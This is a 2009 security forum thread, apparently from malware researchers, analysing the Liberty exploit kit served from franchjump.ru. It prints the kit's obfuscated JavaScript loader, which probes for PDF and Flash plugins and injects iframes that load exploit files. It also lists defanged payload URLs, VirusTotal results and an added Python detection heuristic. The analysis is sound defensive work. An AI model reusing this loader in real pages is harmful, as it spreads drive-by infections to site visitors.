Author Topic: pdf swf exploit in iframe  (Read 4472 times)


August 27, 2009, 06:44:47 pm
cleanmx
No luck decoding this with Malzilla...

Code:
http://franchjump.ru/lib/index.php
leads to:
Code:
<html><head></head><body><script>function qVkMn73vX(qVkMn73vX){return true;}var x0RUJqGCTF = new Array("PDF.PdfCtrl",
"AcroPDF.PDF", "ShockwaveFlash.ShockwaveFlash", "Adobe Acrobat", "Adobe PDF", "Flash");this.lpZBwtxYaW=13553;function
b7vOGuKPk(rhodih6xR){var lSQBVtKKX=false;var njJadnyF2 = document.createElement("iframe");var
vGTSfY3ftC='vGTSfY3ftC';njJadnyF2.setAttribute("src", rhodih6xR);var
ra2KsGcQ3="ra2KsGcQ3";njJadnyF2.setAttribute("width", 200);var fTdFvA65k=1511;njJadnyF2.setAttribute("height",
200);this.cE7Uzbow='cE7Uzbow';document.body.appendChild(njJadnyF2);this.f1ZyDcfNJ=16427;}this.lFGmhMmt9=false;if(navigator.userAgent.indexOf("MSIE")
!= -1){this.lFGmhMmt9=false;for(mMb5G2BC = 0; mMb5G2BC < 3; mMb5G2BC ++){try{mzF1gvC6I = new
ActiveXObject(x0RUJqGCTF[mMb5G2BC]);function wEmSDxNQh(){}if(mzF1gvC6I){function iw2iiIFYF(iw2iiIFYF){return
true;}switch(mMb5G2BC){case 0:case 1:b7vOGuKPk("belowTendSome.pdf");break;case 2:b7vOGuKPk("evilSOr.swf");break;}var
wLGLEXnXZ=27351;}else{var sEZtIAB6M="sEZtIAB6M";}}catch(e){ function sHpNQCBS6(sHpNQCBS6){return sHpNQCBS6;}
}}}else{this.tHPi7ocW4="tHPi7ocW4";for(w594UW3fa = 0; w594UW3fa <= navigator.plugins.length; w594UW3fa++){var a1VPNeZNR
= navigator.plugins[w594UW3fa].name;if((a1VPNeZNR.indexOf(x0RUJqGCTF[3]) != -1 || a1VPNeZNR.indexOf(x0RUJqGCTF[4]) !=
-1)) b7vOGuKPk("belowTendSome.pdf");if( a1VPNeZNR.indexOf(x0RUJqGCTF[5]) != -1 ) b7vOGuKPk("evilSOr.swf");}function
wJwuFMJm(wJwuFMJm){return true;}}this.rsmpJInjI='rsmpJInjI';var hhNE48RIR="hhNE48RIR";var
jPyi2a1aR="jPyi2a1aR";</script></body></html>
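As an added defender-side example (not code from this thread), a Python heuristic that flags landing pages built like the one above: reader/plugin probing for PDF and Flash handlers, followed by injection of a small iframe that points at a .pdf or .swf file. The sample input is a constructed, shortened version of the posted snippet with the random identifiers renamed.

```python
"""Heuristic scorer for plugin-probing iframe loaders of the kind posted above."""
import re

# ProgIDs and plugin names the loader probes for (taken from the snippet).
READER_PROBES = ("PDF.PdfCtrl", "AcroPDF.PDF", "ShockwaveFlash.ShockwaveFlash",
                 "Adobe Acrobat", "Adobe PDF", "Flash")

# Structural indicators of the loader; each one found adds one point.
INDICATORS = {
    "activex_probe": re.compile(r"new\s+ActiveXObject\s*\("),
    "plugin_enum": re.compile(r"navigator\.plugins\s*\["),
    "iframe_create": re.compile(r'createElement\s*\(\s*["\']iframe["\']'),
    "iframe_src": re.compile(r'setAttribute\s*\(\s*["\']src["\']'),
    "tiny_frame": re.compile(
        r'setAttribute\s*\(\s*["\'](?:width|height)["\']\s*,\s*\d{1,3}\s*\)'),
}

# Quoted strings ending in .pdf/.swf (case-sensitive so "AcroPDF.PDF" is not a hit).
PAYLOAD_RE = re.compile(r'["\']([^"\']+\.(?:pdf|swf))["\']')


def analyze(html: str) -> dict:
    """Return matched indicators, reader probes named, payload names and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    probes = [p for p in READER_PROBES if p in html]
    payloads = sorted(set(PAYLOAD_RE.findall(html)))
    score = len(hits) + (1 if probes else 0)   # naming reader ProgIDs adds one point
    return {"indicators": hits, "probes": probes, "payloads": payloads,
            "score": score, "suspicious": score >= 3 and bool(payloads)}


# Constructed excerpt condensed from the posted snippet (identifiers shortened).
SAMPLE = """<script>var ids = new Array("PDF.PdfCtrl","AcroPDF.PDF",
"ShockwaveFlash.ShockwaveFlash","Adobe Acrobat","Adobe PDF","Flash");
function load(u){var f=document.createElement("iframe");f.setAttribute("src",u);
f.setAttribute("width",200);f.setAttribute("height",200);document.body.appendChild(f);}
if(navigator.userAgent.indexOf("MSIE")!=-1){for(i=0;i<3;i++){try{o=new ActiveXObject(ids[i]);
if(o){switch(i){case 0:case 1:load("belowTendSome.pdf");break;case 2:load("evilSOr.swf");break;}}}catch(e){}}}
else{for(j=0;j<=navigator.plugins.length;j++){var n=navigator.plugins[j].name;
if(n.indexOf(ids[3])!=-1||n.indexOf(ids[4])!=-1)load("belowTendSome.pdf");
if(n.indexOf(ids[5])!=-1)load("evilSOr.swf");}}</script>"""

if __name__ == "__main__":
    print(analyze(SAMPLE))
```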

August 27, 2009, 07:01:02 pm
Reply #1

MysteryFCM

Full source code for it attached (above is only partial code)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 27, 2009, 11:42:32 pm
Reply #2

RS-232

hxxp://franchjump.ru/lib/update.php?id=2
Result: 10/41 (24.4%)
http://www.virustotal.com/analisis/d35dbb8eb7cc043ccb7f92aabe8886785ad35adb54cc8c139bdee00ab8d89c50-1251416118

hxxp://franchjump.ru/lib/webThere.png
Result: 5/41 (12.2%)
http://www.virustotal.com/analisis/669db4a1fa13693720475125509f752fddc1c347eed7959dbbb74de6d4bb8785-1251416942

hxxp://franchjump.ru/lib/belowTendSome.pdf
Result: 6/41 (14.64%)
http://www.virustotal.com/analisis/5434abe05a5ae1114754176e7297839e96d2b9ebe8082e28c31a3d2944e1cbe5-1251415971

hxxp://franchjump.ru/lib/evilSOr.swf
Result: 2/41 (4.88%)
http://www.virustotal.com/analisis/640e72c3753dd90322fbb26728d44011e0041824ede84419474f19b5227b38b9-1251390004

This crap is UCS2 with a twist... now if only I were slightly better at regexp, but anyway...
A bit of google-fu revealed how to go about de-obfuscating this lameness:  :)
http://www.web2secure.com/2009/08/complex-obfuscated-js-code-in-pdf.html

Semi-decoded JS crap in attachment below - nice IP address by the way, full of crappy domains...
http://www.bfk.de/bfk_dnslogger.html?query=211.95.78.98#result
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

August 28, 2009, 11:51:57 am
Reply #3

RS-232

From the same IP (and not already spotted in the list, as most of the aforementioned domains are)...

hxxp://uploadfilefree.ru/cc.exe
Result: 2/41 (4.88%):
http://www.virustotal.com/analisis/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df-1251460092

August 28, 2009, 12:13:37 pm
Reply #4

WIEx

This is a Liberty Exploit.

August 28, 2009, 12:20:23 pm
Reply #5

RS-232

Quote
this is a Liberty Exploit
...nothing really special in it in my personal view (at least when compared to the rest of exploit packs),
except maybe from the Exploit.JS.DirektShow in the 'webThere.png' mentioned above...